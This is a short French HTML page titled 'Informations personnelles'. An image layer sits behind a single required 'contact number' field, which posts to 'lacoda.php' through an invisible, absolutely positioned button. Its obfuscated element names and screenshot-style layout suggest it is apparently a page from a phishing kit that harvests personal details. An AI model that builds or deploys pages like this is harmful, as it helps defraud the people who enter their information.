﻿<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
	<head>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
		<title>Informations personnelles</title>
		<link href="styles.css" rel="stylesheet" type="text/css">
	</head>
	<body>
		<div id="background"><form method="post" action="lacoda.php">
			<div id="Calque0"><img src="images/Calque0.png"></div>
			<div id="cd"><input type="text" id="noli" placeholder="Numéro de contact" autocomplete="off" name="ramid" required></div>
			<input type="submit" id="zviva0" name="" value="" style="    position: absolute;
    left: 668px;
    top: 480px;
    width: 180px;
    height: 42px;
    z-index: 5;">
		</div>
 </body>
 </html>